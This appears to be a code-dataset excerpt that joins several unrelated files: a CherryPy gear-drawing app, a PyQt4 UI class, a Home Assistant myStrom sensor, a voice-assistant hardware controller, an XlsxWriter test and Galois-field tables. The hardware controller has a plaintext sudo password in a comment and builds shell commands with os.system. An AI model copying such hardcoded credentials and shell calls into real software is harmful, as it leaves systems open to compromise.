ang=-2.*j*pi/n+sigma
ang2=2.*j*pi/n+sigma
lxd=midx+rd*sin(ang2-2.*pi/n)
lyd=midy-rd*cos(ang2-2.*pi/n)
#for(i=0;i<=imax;i++):
for i in range(imax+1):
r=rb+i*dr
theta=sqrt((r*r)/(rb*rb)-1.)
alpha=theta-atan(theta)
xpt=r*sin(alpha-ang)
ypt=r*cos(alpha-ang)
xd=rd*sin(-ang)
yd=rd*cos(-ang)
# i=0 時, 繪線起點由齒根圓上的點, 作為起點
if(i==0):
last_x = midx+xd
last_y = midy-yd
# 由左側齒根圓作為起點, 除第一點 (xd,yd) 齒根圓上的起點外, 其餘的 (xpt,ypt)則為漸開線上的分段點
create_line((midx+xpt),(midy-ypt),(last_x),(last_y),fill=顏色)
# 最後一點, 則為齒頂圓
if(i==imax):
lfx=midx+xpt
lfy=midy-ypt
last_x = midx+xpt
last_y = midy-ypt
# the line from last end of dedendum point to the recent
# end of dedendum point
# lxd 為齒根圓上的左側 x 座標, lyd 則為 y 座標
# 下列為齒根圓上用來近似圓弧的直線
create_line((lxd),(lyd),(midx+xd),(midy-yd),fill=顏色)
#for(i=0;i<=imax;i++):
for i in range(imax+1):
r=rb+i*dr
theta=sqrt((r*r)/(rb*rb)-1.)
alpha=theta-atan(theta)
xpt=r*sin(ang2-alpha)
ypt=r*cos(ang2-alpha)
xd=rd*sin(ang2)
yd=rd*cos(ang2)
# i=0 時, 繪線起點由齒根圓上的點, 作為起點
if(i==0):
last_x = midx+xd
last_y = midy-yd
# 由右側齒根圓作為起點, 除第一點 (xd,yd) 齒根圓上的起點外, 其餘的 (xpt,ypt)則為漸開線上的分段點
create_line((midx+xpt),(midy-ypt),(last_x),(last_y),fill=顏色)
# 最後一點, 則為齒頂圓
if(i==imax):
rfx=midx+xpt
rfy=midy-ypt
last_x = midx+xpt
last_y = midy-ypt
# lfx 為齒頂圓上的左側 x 座標, lfy 則為 y 座標
# 下列為齒頂圓上用來近似圓弧的直線
create_line(lfx,lfy,rfx,rfy,fill=顏色)
齒輪(400,400,300,41,"blue")
</script>
<canvas id="plotarea" width="800" height="800"></canvas>
</body>
</html>
'''
return outstring
#@+node:2015.20150621222226.1: *3* drawspur
@cherrypy.expose
# N 為上齒數, M 為下齒數, P 為壓力角
def drawspur(self,N1=15,N2=24, M=4, P=20,midx=400):
outstring = '''
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
</head>
<body>
<form method=POST action=mygeartest2>
上齒數:<input type=text name=N1 value='''+str(N1)+'''><br />
下齒數:<input type=text name=N2 value='''+str(N2)+'''><br />
<input type=submit value=畫出正齒輪輪廓>
</form>
<h3>齒輪數為介於 15-80 的整數</h3>
<br /><a href="index">返回</a><br />
<!-- 載入 brython.js -->
<script type="text/javascript" src="/static/Brython3.1.1-20150328-091302/brython.js"></script>
<script>
window.onload=function(){
brython();
}
</script>
</body>
</html>
'''
return outstring
#@+node:amd.20150415215023.1: *3* mygeartest2
@cherrypy.expose
# N 為齒數, M 為模數, P 為壓力角
def mygeartest2(self, N1=15, N2=24, M=4, P=15):
outstring = '''
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<br /><a href="drawspur">返回</a><br />
<!-- 載入 brython.js -->
<script type="text/javascript" src="/static/Brython3.1.1-20150328-091302/brython.js"></script>
<script src="/static/Cango2D.js" type="text/javascript"></script>
<script src="/static/gearUtils-04.js" type="text/javascript"></script>
</head>
<!-- 啟動 brython() -->
<body onload="brython()">
<!-- 以下為 canvas 畫圖程式 -->
<script type="text/python">
# 從 browser 導入 document
from browser import document
from math import *
# 請注意, 這裡導入位於 Lib/site-packages 目錄下的 spur.py 檔案
import spur
# 準備在 id="plotarea" 的 canvas 中繪圖
canvas = document["plotarea"]
ctx = canvas.getContext("2d")
# 以下利用 spur.py 程式進行繪圖, 接下來的協同設計運算必須要配合使用者的需求進行設計運算與繪圖
# 其中並將工作分配給其他組員建立類似 spur.py 的相關零件繪圖模組
# midx, midy 為齒輪圓心座標, rp 為節圓半徑, n 為齒數, pa 為壓力角, color 為線的顏色
# Gear(midx, midy, rp, n=20, pa=20, color="black"):
# 模數決定齒的尺寸大小, 囓合齒輪組必須有相同的模數與壓力角
# 壓力角 pa 單位為角度
pa = 10
# m 為模數
m = 10
# 第1齒輪齒數
n_g1 = '''+str(N1)+'''
# 第2齒輪齒數
n_g2 = '''+str(N2)+'''
# 計算兩齒輪的節圓半徑
rp_g1 = m*n_g1/2
rp_g2 = m*n_g2/2
# 將第1齒輪順時鐘轉 90 度
# 使用 ctx.save() 與 ctx.restore() 以確保各齒輪以相對座標進行旋轉繪圖
ctx.save()
# translate to the origin of second gear
ctx.translate(400,400)
# rotate to engage
ctx.rotate(pi)
# put it back
ctx.translate(-400,-400)
spur.Spur(ctx).Gear(400,400,rp_g1,n_g1, pa, "blue")
ctx.restore()
# 將第2齒輪逆時鐘轉 90 度之後, 再多轉一齒, 以便與第1齒輪進行囓合
ctx.save()
# translate to the origin of second gear
ctx.translate(400,400+rp_g1+rp_g2)
# rotate to engage
ctx.rotate(-pi/n_g2)
# put it back
ctx.translate(-400,-(400+rp_g1+rp_g2))
spur.Spur(ctx).Gear(400,400+rp_g1+rp_g2,rp_g2,n_g2, pa, "black")
ctx.restore()
# 按照上面三個正齒輪的囓合轉角運算, 隨後的傳動齒輪轉角便可依此類推, 完成6個齒輪的囓合繪圖
</script>
<canvas id="plotarea" width="1500" height="1500"></canvas>
</body>
</html>
'''
return outstring
#@+node:2015.20150331094055.1737: *3* my3Dgeartest
@cherrypy.expose
# N 為齒數, M 為模數, P 為壓力角
def my3Dgeartest(self, N=20, M=5, P=15):
outstring = '''
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<!-- 載入 brython.js -->
<script type="text/javascript" src="/static/Brython3.1.1-20150328-091302/brython.js"></script>
<script src="/static/Cango2D.js" type="text/javascript"></script>
<script src="/static/gearUtils-04.js" type="text/javascript"></script>
</head>
<!-- 啟動 brython() -->
<body onload="brython()">
<!-- 以下為 canvas 畫圖程式 -->
<script type="text/python">
# 從 browser 導入 document
from browser import document
from math import *
# 準備在 id="plotarea" 的 canvas 中繪圖
canvas = document["plotarea"]
ctx = canvas.getContext("2d")
def create_line(x1, y1, x2, y2, width=3, fill="red"):
ctx.beginPath()
ctx.lineWidth = width
ctx.moveTo(x1, y1)
ctx.lineTo(x2, y2)
ctx.strokeStyle = fill
ctx.stroke()
# 導入數學函式後, 圓周率為 pi
# deg 為角度轉為徑度的轉換因子
deg = pi/180.
#
# 以下分別為正齒輪繪圖與主 tkinter 畫布繪圖
#
# 定義一個繪正齒輪的繪圖函式
# midx 為齒輪圓心 x 座標
# midy 為齒輪圓心 y 座標
# rp 為節圓半徑, n 為齒數
def gear(midx, midy, rp, n, 顏色):
# 將角度轉換因子設為全域變數
global deg
# 齒輪漸開線分成 15 線段繪製
imax = 15
# 在輸入的畫布上繪製直線, 由圓心到節圓 y 軸頂點畫一直線
create_line(midx, midy, midx, midy-rp)
# 畫出 rp 圓, 畫圓函式尚未定義
#create_oval(midx-rp, midy-rp, midx+rp, midy+rp, width=2)
# a 為模數 (代表公制中齒的大小), 模數為節圓直徑(稱為節徑)除以齒數
# 模數也就是齒冠大小
a=2*rp/n
# d 為齒根大小, 為模數的 1.157 或 1.25倍, 這裡採 1.25 倍
d=2.5*rp/n
# ra 為齒輪的外圍半徑
ra=rp+a
print("ra:", ra)
# 畫出 ra 圓, 畫圓函式尚未定義
#create_oval(midx-ra, midy-ra, midx+ra, midy+ra, width=1)
# rb 則為齒輪的基圓半徑
# 基圓為漸開線長齒之基準圓
rb=rp*cos(20*deg)
print("rp:", rp)
print("rb:", rb)
# 畫出 rb 圓 (基圓), 畫圓函式尚未定義
#create_oval(midx-rb, midy-rb, midx+rb, midy+rb, width=1)
# rd 為齒根圓半徑
rd=rp-d
# 當 rd 大於 rb 時
print("rd:", rd)
# 畫出 rd 圓 (齒根圓), 畫圓函式尚未定義
#create_oval(midx-rd, midy-rd, midx+rd, midy+rd, width=1)
# dr 則為基圓到齒頂圓半徑分成 imax 段後的每段半徑增量大小
# 將圓弧分成 imax 段來繪製漸開線
dr=(ra-rb)/imax
# tan(20*deg)-20*deg 為漸開線函數
sigma=pi/(2*n)+tan(20*deg)-20*deg
for j in range(n):
ang=-2.*j*pi/n+sigma
ang2=2.*j*pi/n+sigma
lxd=midx+rd*sin(ang2-2.*pi/n)
lyd=midy-rd*cos(ang2-2.*pi/n)
#for(i=0;i<=imax;i++):
for i in range(imax+1):
r=rb+i*dr
theta=sqrt((r*r)/(rb*rb)-1.)
alpha=theta-atan(theta)
xpt=r*sin(alpha-ang)
ypt=r*cos(alpha-ang)
xd=rd*sin(-ang)
yd=rd*cos(-ang)
# i=0 時, 繪線起點由齒根圓上的點, 作為起點
if(i==0):
last_x = midx+xd
last_y = midy-yd
# 由左側齒根圓作為起點, 除第一點 (xd,yd) 齒根圓上的起點外, 其餘的 (xpt,ypt)則為漸開線上的分段點
create_line((midx+xpt),(midy-ypt),(last_x),(last_y),fill=顏色)
# 最後一點, 則為齒頂圓
if(i==imax):
lfx=midx+xpt
lfy=midy-ypt
last_x = midx+xpt
last_y = midy-ypt
# the line from last end of dedendum point to the recent
# end of dedendum point
# lxd 為齒根圓上的左側 x 座標, lyd 則為 y 座標
# 下列為齒根圓上用來近似圓弧的直線
create_line((lxd),(lyd),(midx+xd),(midy-yd),fill=顏色)
#for(i=0;i<=imax;i++):
for i in range(imax+1):
r=rb+i*dr
theta=sqrt((r*r)/(rb*rb)-1.)
alpha=theta-atan(theta)
xpt=r*sin(ang2-alpha)
ypt=r*cos(ang2-alpha)
xd=rd*sin(ang2)
yd=rd*cos(ang2)
# i=0 時, 繪線起點由齒根圓上的點, 作為起點
if(i==0):
last_x = midx+xd
last_y = midy-yd
# 由右側齒根圓作為起點, 除第一點 (xd,yd) 齒根圓上的起點外, 其餘的 (xpt,ypt)則為漸開線上的分段點
create_line((midx+xpt),(midy-ypt),(last_x),(last_y),fill=顏色)
# 最後一點, 則為齒頂圓
if(i==imax):
rfx=midx+xpt
rfy=midy-ypt
last_x = midx+xpt
last_y = midy-ypt
# lfx 為齒頂圓上的左側 x 座標, lfy 則為 y 座標
# 下列為齒頂圓上用來近似圓弧的直線
create_line(lfx,lfy,rfx,rfy,fill=顏色)
gear(400,400,300,41,"blue")
</script>
<canvas id="plotarea" width="800" height="800"></canvas>
</body>
</html>
'''
return outstring
#@+node:2014fall.20141215194146.1793: *3* doCheck
@cherrypy.expose
def doCheck(self, guess=None):
# 假如使用者直接執行 doCheck, 則設法轉回根方法
if guess is None:
raise cherrypy.HTTPRedirect("/")
# 從 session 取出 answer 對應資料, 且處理直接執行 doCheck 時無法取 session 值情況
try:
theanswer = int(cherrypy.session.get('answer'))
except:
raise cherrypy.HTTPRedirect("/")
# 經由表單所取得的 guess 資料型別為 string
try:
theguess = int(guess)
except:
return "error " + self.guessform()
# 每執行 doCheck 一次,次數增量一次
cherrypy.session['count'] += 1
# 答案與所猜數字進行比對
if theanswer < theguess:
return "big " + self.guessform()
elif theanswer > theguess:
return "small " + self.guessform()
else:
# 已經猜對, 從 session 取出累計猜測次數
thecount = cherrypy.session.get('count')
return "exact: <a href=''>再猜</a>"
#@+node:2014fall.20141215194146.1789: *3* guessform
def guessform(self):
# 印出讓使用者輸入的超文件表單
outstring = str(cherrypy.session.get('answer')) + "/" + str(cherrypy.session.get('count')) + '''<form method=POST action=doCheck>
請輸入您所猜的整數:<input type=text name=guess><br />
<input type=submit value=send>
</form>'''
return outstring
#@-others
#@-others
################# (4) 程式啟動區
# 配合程式檔案所在目錄設定靜態目錄或靜態檔案
application_conf = {'/static':{
'tools.staticdir.on': True,
# 程式執行目錄下, 必須自行建立 static 目錄
'tools.staticdir.dir': _curdir+"/static"},
'/downloads':{
'tools.staticdir.on': True,
'tools.staticdir.dir': data_dir+"/downloads"},
'/images':{
'tools.staticdir.on': True,
'tools.staticdir.dir': data_dir+"/images"}
}
root = Hello()
root.gear = gear.Gear()
cherrypy.server.socket_port = 8080
cherrypy.server.socket_host = '127.0.0.1'
if 'OPENSHIFT_REPO_DIR' in os.environ.keys():
# 表示在 OpenSfhit 執行
application = cherrypy.Application(root, config=application_conf)
else:
# 表示在近端執行
cherrypy.quickstart(root, config=application_conf)
#@-leo
|
gpl-3.0
| -6,298,804,478,695,336,000 | 34.762295 | 184 | 0.582627 | false |
raulperula/python_tutorials
|
tutorial-pyqt/src/example12.py
|
1
|
5052
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'example12.ui'
#
# Created: Sun Jan 18 18:25:33 2015
# by: PyQt4 UI code generator 4.9.1
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
_fromUtf8 = lambda s: s
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName(_fromUtf8("MainWindow"))
MainWindow.resize(534, 613)
self.centralwidget = QtGui.QWidget(MainWindow)
self.centralwidget.setObjectName(_fromUtf8("centralwidget"))
self.mdiArea = QtGui.QMdiArea(self.centralwidget)
self.mdiArea.setGeometry(QtCore.QRect(20, 20, 441, 421))
self.mdiArea.setObjectName(_fromUtf8("mdiArea"))
self.subwindow = QtGui.QWidget()
self.subwindow.setObjectName(_fromUtf8("subwindow"))
self.label = QtGui.QLabel(self.subwindow)
self.label.setGeometry(QtCore.QRect(50, 30, 66, 17))
self.label.setObjectName(_fromUtf8("label"))
self.subwindow_2 = QtGui.QWidget()
self.subwindow_2.setObjectName(_fromUtf8("subwindow_2"))
self.label_2 = QtGui.QLabel(self.subwindow_2)
self.label_2.setGeometry(QtCore.QRect(80, 30, 66, 17))
self.label_2.setObjectName(_fromUtf8("label_2"))
self.pushButton_next = QtGui.QPushButton(self.centralwidget)
self.pushButton_next.setGeometry(QtCore.QRect(20, 460, 98, 27))
self.pushButton_next.setObjectName(_fromUtf8("pushButton_next"))
self.pushButton__back = QtGui.QPushButton(self.centralwidget)
self.pushButton__back.setGeometry(QtCore.QRect(190, 460, 98, 27))
self.pushButton__back.setObjectName(_fromUtf8("pushButton__back"))
self.pushButton__close = QtGui.QPushButton(self.centralwidget)
self.pushButton__close.setGeometry(QtCore.QRect(350, 460, 98, 27))
self.pushButton__close.setObjectName(_fromUtf8("pushButton__close"))
self.pushButton_cascade = QtGui.QPushButton(self.centralwidget)
self.pushButton_cascade.setGeometry(QtCore.QRect(20, 500, 98, 27))
self.pushButton_cascade.setObjectName(_fromUtf8("pushButton_cascade"))
self.pushButton_tail = QtGui.QPushButton(self.centralwidget)
self.pushButton_tail.setGeometry(QtCore.QRect(140, 500, 98, 27))
self.pushButton_tail.setObjectName(_fromUtf8("pushButton_tail"))
self.pushButton_subwindow = QtGui.QPushButton(self.centralwidget)
self.pushButton_subwindow.setGeometry(QtCore.QRect(260, 500, 121, 27))
self.pushButton_subwindow.setObjectName(_fromUtf8("pushButton_subwindow"))
self.pushButton_tab = QtGui.QPushButton(self.centralwidget)
self.pushButton_tab.setGeometry(QtCore.QRect(400, 500, 98, 27))
self.pushButton_tab.setObjectName(_fromUtf8("pushButton_tab"))
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtGui.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 534, 25))
self.menubar.setObjectName(_fromUtf8("menubar"))
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtGui.QStatusBar(MainWindow)
self.statusbar.setObjectName(_fromUtf8("statusbar"))
MainWindow.setStatusBar(self.statusbar)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
MainWindow.setWindowTitle(QtGui.QApplication.translate("MainWindow", "MainWindow", None, QtGui.QApplication.UnicodeUTF8))
self.subwindow.setWindowTitle(QtGui.QApplication.translate("MainWindow", "Subwindow", None, QtGui.QApplication.UnicodeUTF8))
self.label.setText(QtGui.QApplication.translate("MainWindow", "TextLabel", None, QtGui.QApplication.UnicodeUTF8))
self.subwindow_2.setWindowTitle(QtGui.QApplication.translate("MainWindow", "Subwindow", None, QtGui.QApplication.UnicodeUTF8))
self.label_2.setText(QtGui.QApplication.translate("MainWindow", "TextLabel", None, QtGui.QApplication.UnicodeUTF8))
self.pushButton_next.setText(QtGui.QApplication.translate("MainWindow", "Next", None, QtGui.QApplication.UnicodeUTF8))
self.pushButton__back.setText(QtGui.QApplication.translate("MainWindow", "Back", None, QtGui.QApplication.UnicodeUTF8))
self.pushButton__close.setText(QtGui.QApplication.translate("MainWindow", "Close All", None, QtGui.QApplication.UnicodeUTF8))
self.pushButton_cascade.setText(QtGui.QApplication.translate("MainWindow", "Cascade", None, QtGui.QApplication.UnicodeUTF8))
self.pushButton_tail.setText(QtGui.QApplication.translate("MainWindow", "Tail", None, QtGui.QApplication.UnicodeUTF8))
self.pushButton_subwindow.setText(QtGui.QApplication.translate("MainWindow", "View Subwindow", None, QtGui.QApplication.UnicodeUTF8))
self.pushButton_tab.setText(QtGui.QApplication.translate("MainWindow", "View Tab", None, QtGui.QApplication.UnicodeUTF8))
|
gpl-3.0
| 842,008,327,386,751,700 | 60.609756 | 141 | 0.722288 | false |
fbradyirl/home-assistant
|
homeassistant/components/mystrom/binary_sensor.py
|
1
|
2888
|
"""Support for the myStrom buttons."""
import logging
from homeassistant.components.binary_sensor import DOMAIN, BinarySensorDevice
from homeassistant.components.http import HomeAssistantView
from homeassistant.const import HTTP_UNPROCESSABLE_ENTITY
_LOGGER = logging.getLogger(__name__)
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
"""Set up myStrom Binary Sensor."""
hass.http.register_view(MyStromView(async_add_entities))
return True
class MyStromView(HomeAssistantView):
"""View to handle requests from myStrom buttons."""
url = "/api/mystrom"
name = "api:mystrom"
supported_actions = ["single", "double", "long", "touch"]
def __init__(self, add_entities):
"""Initialize the myStrom URL endpoint."""
self.buttons = {}
self.add_entities = add_entities
async def get(self, request):
"""Handle the GET request received from a myStrom button."""
res = await self._handle(request.app["hass"], request.query)
return res
async def _handle(self, hass, data):
"""Handle requests to the myStrom endpoint."""
button_action = next(
(parameter for parameter in data if parameter in self.supported_actions),
None,
)
if button_action is None:
_LOGGER.error("Received unidentified message from myStrom button: %s", data)
return (
"Received unidentified message: {}".format(data),
HTTP_UNPROCESSABLE_ENTITY,
)
button_id = data[button_action]
entity_id = "{}.{}_{}".format(DOMAIN, button_id, button_action)
if entity_id not in self.buttons:
_LOGGER.info(
"New myStrom button/action detected: %s/%s", button_id, button_action
)
self.buttons[entity_id] = MyStromBinarySensor(
"{}_{}".format(button_id, button_action)
)
self.add_entities([self.buttons[entity_id]])
else:
new_state = self.buttons[entity_id].state == "off"
self.buttons[entity_id].async_on_update(new_state)
class MyStromBinarySensor(BinarySensorDevice):
"""Representation of a myStrom button."""
def __init__(self, button_id):
"""Initialize the myStrom Binary sensor."""
self._button_id = button_id
self._state = None
@property
def name(self):
"""Return the name of the sensor."""
return self._button_id
@property
def should_poll(self):
"""No polling needed."""
return False
@property
def is_on(self):
"""Return true if the binary sensor is on."""
return self._state
def async_on_update(self, value):
"""Receive an update."""
self._state = value
self.async_schedule_update_ha_state()
|
apache-2.0
| 4,502,797,213,050,914,000 | 31.088889 | 88 | 0.611842 | false |
vidursatija/voiceai
|
loadhardware.py
|
1
|
3338
|
import os
from subprocess import Popen, PIPE
from typeclassifier import TypeClassifier
class HardwareControl:
def __init__(self):
self.classifier = TypeClassifier("fastText/voiceai-hardware.bin", "fastText/fasttext")
self.backlightDir = "/sys/class/backlight/acpi_video0/"
self.maxBrightnessDir = self.backlightDir+'max_brightness'
self.brightnessDir = self.backlightDir+'brightness'
self.brightCmd = 'tee'
f = open(self.maxBrightnessDir, 'r')
self.max_brightness = int(f.readline())
f.close()
f = open(self.brightnessDir, 'r')
self.brightness = int(f.readline())
f.close()
self.volumeCmd = "amixer set 'Master' "
def textFilter(self, tagged):
keep_words = ['xVB', 'xRP', 'xNN']
change_tags = ['xCD']
# change tags -> keep tags -> return array of tuple
filtered_tags = []
for tup in tagged:
for k_w in keep_words:
if tup[1] == k_w:
filtered_tags.append(tup)
break
for c_t in change_tags:
if tup[1] == c_t:
filtered_tags.append((tup[1], tup[1]))
break
return filtered_tags
def functionFilter(self, tagged, pure_entities):
keep_words = ['xVB', 'xRP', 'xNN', 'xIN']
change_tags = ['xCD']
NUM = []
# change tags -> keep tags -> return array of tuple
filtered_tags = []
for tup in tagged:
for k_w in keep_words:
if tup[1] == k_w:
filtered_tags.append(tup)
break
if tup[1] == 'xCD':
NUM.append(int(tup[0]))
for c_t in change_tags:
if tup[1] == c_t:
filtered_tags.append((tup[1], tup[1]))
break
text = [tup[0] for tup in filtered_tags]
f_type, prob = self.classifier.classifyText(" ".join(text))
msg = ""
percent = 15
if len(NUM) > 0:
percent = int(NUM[0])
if f_type == 1:
return "".join([msg, self.increaseVolume(percent)])
if f_type == 2:
return "".join([msg, self.increaseVolume(percent, False)])
if f_type == 3:
return "".join([msg, self.increaseBrightness(percent)])
if f_type == 4:
return "".join([msg, self.increaseBrightness(percent, False)])
if f_type == 5:
return "".join([msg, self.setVolume(percent)])
if f_type == 6:
return "".join([msg, self.setBrightness(percent)])
return "I'm sorry, I didn't get that"
def setVolume(self, percent):
os.system("".join([self.volumeCmd, str(percent), '%']))
return "Volume set"
def increaseVolume(self, percent, positive=True):
sign = '+'
if positive == False:
sign = '-'
os.system("".join([self.volumeCmd, str(percent), '%', sign]))
return "Volume increased/decreased"
def setBrightness(self, percent):
if percent > 100:
percent = 100
if percent < 0:
percent = 0
self.brightness = int(percent*self.max_brightness/100)
#sudoService = Popen(['sudo', '-S', 'su'], stdout=PIPE, stderr=PIPE)
#o = sudoService.communicate(input='ironpatriot')
os.system(" ".join(["echo", str(self.brightness), ">>", self.brightnessDir]))
#brightnessService = Popen(["echo", " ".join(["2", ">>", self.brightnessDir])], stdout=PIPE, stderr=PIPE)
#out = brightnessService.communicate(input='2')
#sudoService = Popen(['exit'])
return "Brightness set"
def increaseBrightness(self, percent, positive=True):
cPercent = self.brightness*100/self.max_brightness
if positive:
cPercent = cPercent + percent
else:
cPercent = cPercent - percent
return self.setBrightness(cPercent)
|
apache-2.0
| -5,138,109,972,561,166,000 | 27.05042 | 107 | 0.64979 | false |
ivmech/iviny-scope
|
lib/xlsxwriter/test/worksheet/test_extract_filter_tokens.py
|
1
|
2758
|
###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013, John McNamara, jmcnamara@cpan.org
#
import unittest
from ...compatibility import StringIO
from ...worksheet import Worksheet
class TestExtractFilterTokens(unittest.TestCase):
"""
Test the Worksheet _extract_filter_tokens() method.
"""
def setUp(self):
self.fh = StringIO()
self.worksheet = Worksheet()
self.worksheet._set_filehandle(self.fh)
def test_extract_filter_tokens(self):
"""Test the _extract_filter_tokens() method"""
testcases = [
[
None,
[],
],
[
'',
[],
],
[
'0 < 2001',
['0', '<', '2001'],
],
[
'x < 2000',
['x', '<', '2000'],
],
[
'x > 2000',
['x', '>', '2000'],
],
[
'x == 2000',
['x', '==', '2000'],
],
[
'x > 2000 and x < 5000',
['x', '>', '2000', 'and', 'x', '<', '5000'],
],
[
'x = "goo"',
['x', '=', 'goo'],
],
[
'x = moo',
['x', '=', 'moo'],
],
[
'x = "foo baz"',
['x', '=', 'foo baz'],
],
[
'x = "moo "" bar"',
['x', '=', 'moo " bar'],
],
[
'x = "foo bar" or x = "bar foo"',
['x', '=', 'foo bar', 'or', 'x', '=', 'bar foo'],
],
[
'x = "foo "" bar" or x = "bar "" foo"',
['x', '=', 'foo " bar', 'or', 'x', '=', 'bar " foo'],
],
[
'x = """"""""',
['x', '=', '"""'],
],
[
'x = Blanks',
['x', '=', 'Blanks'],
],
[
'x = NonBlanks',
['x', '=', 'NonBlanks'],
],
[
'top 10 %',
['top', '10', '%'],
],
[
'top 10 items',
['top', '10', 'items'],
],
]
for testcase in testcases:
expression = testcase[0]
exp = testcase[1]
got = self.worksheet._extract_filter_tokens(expression)
self.assertEqual(got, exp)
if __name__ == '__main__':
unittest.main()
|
gpl-3.0
| -3,116,406,206,606,398,500 | 20.379845 | 79 | 0.273387 | false |
xSAVIKx/SHUP-algorithm
|
algorithm/util.py
|
1
|
16299
|
__author__ = 'Iurii Sergiichuk <iurii.sergiichuk@gmail.com>'
gal1 = tuple(range(256))
gal2 = (
0x00, 0x02, 0x04, 0x06, 0x08, 0x0a, 0x0c, 0x0e, 0x10, 0x12, 0x14, 0x16, 0x18, 0x1a, 0x1c, 0x1e,
0x20, 0x22, 0x24, 0x26, 0x28, 0x2a, 0x2c, 0x2e, 0x30, 0x32, 0x34, 0x36, 0x38, 0x3a, 0x3c, 0x3e,
0x40, 0x42, 0x44, 0x46, 0x48, 0x4a, 0x4c, 0x4e, 0x50, 0x52, 0x54, 0x56, 0x58, 0x5a, 0x5c, 0x5e,
0x60, 0x62, 0x64, 0x66, 0x68, 0x6a, 0x6c, 0x6e, 0x70, 0x72, 0x74, 0x76, 0x78, 0x7a, 0x7c, 0x7e,
0x80, 0x82, 0x84, 0x86, 0x88, 0x8a, 0x8c, 0x8e, 0x90, 0x92, 0x94, 0x96, 0x98, 0x9a, 0x9c, 0x9e,
0xa0, 0xa2, 0xa4, 0xa6, 0xa8, 0xaa, 0xac, 0xae, 0xb0, 0xb2, 0xb4, 0xb6, 0xb8, 0xba, 0xbc, 0xbe,
0xc0, 0xc2, 0xc4, 0xc6, 0xc8, 0xca, 0xcc, 0xce, 0xd0, 0xd2, 0xd4, 0xd6, 0xd8, 0xda, 0xdc, 0xde,
0xe0, 0xe2, 0xe4, 0xe6, 0xe8, 0xea, 0xec, 0xee, 0xf0, 0xf2, 0xf4, 0xf6, 0xf8, 0xfa, 0xfc, 0xfe,
0x1b, 0x19, 0x1f, 0x1d, 0x13, 0x11, 0x17, 0x15, 0x0b, 0x09, 0x0f, 0x0d, 0x03, 0x01, 0x07, 0x05,
0x3b, 0x39, 0x3f, 0x3d, 0x33, 0x31, 0x37, 0x35, 0x2b, 0x29, 0x2f, 0x2d, 0x23, 0x21, 0x27, 0x25,
0x5b, 0x59, 0x5f, 0x5d, 0x53, 0x51, 0x57, 0x55, 0x4b, 0x49, 0x4f, 0x4d, 0x43, 0x41, 0x47, 0x45,
0x7b, 0x79, 0x7f, 0x7d, 0x73, 0x71, 0x77, 0x75, 0x6b, 0x69, 0x6f, 0x6d, 0x63, 0x61, 0x67, 0x65,
0x9b, 0x99, 0x9f, 0x9d, 0x93, 0x91, 0x97, 0x95, 0x8b, 0x89, 0x8f, 0x8d, 0x83, 0x81, 0x87, 0x85,
0xbb, 0xb9, 0xbf, 0xbd, 0xb3, 0xb1, 0xb7, 0xb5, 0xab, 0xa9, 0xaf, 0xad, 0xa3, 0xa1, 0xa7, 0xa5,
0xdb, 0xd9, 0xdf, 0xdd, 0xd3, 0xd1, 0xd7, 0xd5, 0xcb, 0xc9, 0xcf, 0xcd, 0xc3, 0xc1, 0xc7, 0xc5,
0xfb, 0xf9, 0xff, 0xfd, 0xf3, 0xf1, 0xf7, 0xf5, 0xeb, 0xe9, 0xef, 0xed, 0xe3, 0xe1, 0xe7, 0xe5)
gal3 = (
0x00, 0x03, 0x06, 0x05, 0x0c, 0x0f, 0x0a, 0x09, 0x18, 0x1b, 0x1e, 0x1d, 0x14, 0x17, 0x12, 0x11,
0x30, 0x33, 0x36, 0x35, 0x3c, 0x3f, 0x3a, 0x39, 0x28, 0x2b, 0x2e, 0x2d, 0x24, 0x27, 0x22, 0x21,
0x60, 0x63, 0x66, 0x65, 0x6c, 0x6f, 0x6a, 0x69, 0x78, 0x7b, 0x7e, 0x7d, 0x74, 0x77, 0x72, 0x71,
0x50, 0x53, 0x56, 0x55, 0x5c, 0x5f, 0x5a, 0x59, 0x48, 0x4b, 0x4e, 0x4d, 0x44, 0x47, 0x42, 0x41,
0xc0, 0xc3, 0xc6, 0xc5, 0xcc, 0xcf, 0xca, 0xc9, 0xd8, 0xdb, 0xde, 0xdd, 0xd4, 0xd7, 0xd2, 0xd1,
0xf0, 0xf3, 0xf6, 0xf5, 0xfc, 0xff, 0xfa, 0xf9, 0xe8, 0xeb, 0xee, 0xed, 0xe4, 0xe7, 0xe2, 0xe1,
0xa0, 0xa3, 0xa6, 0xa5, 0xac, 0xaf, 0xaa, 0xa9, 0xb8, 0xbb, 0xbe, 0xbd, 0xb4, 0xb7, 0xb2, 0xb1,
0x90, 0x93, 0x96, 0x95, 0x9c, 0x9f, 0x9a, 0x99, 0x88, 0x8b, 0x8e, 0x8d, 0x84, 0x87, 0x82, 0x81,
0x9b, 0x98, 0x9d, 0x9e, 0x97, 0x94, 0x91, 0x92, 0x83, 0x80, 0x85, 0x86, 0x8f, 0x8c, 0x89, 0x8a,
0xab, 0xa8, 0xad, 0xae, 0xa7, 0xa4, 0xa1, 0xa2, 0xb3, 0xb0, 0xb5, 0xb6, 0xbf, 0xbc, 0xb9, 0xba,
0xfb, 0xf8, 0xfd, 0xfe, 0xf7, 0xf4, 0xf1, 0xf2, 0xe3, 0xe0, 0xe5, 0xe6, 0xef, 0xec, 0xe9, 0xea,
0xcb, 0xc8, 0xcd, 0xce, 0xc7, 0xc4, 0xc1, 0xc2, 0xd3, 0xd0, 0xd5, 0xd6, 0xdf, 0xdc, 0xd9, 0xda,
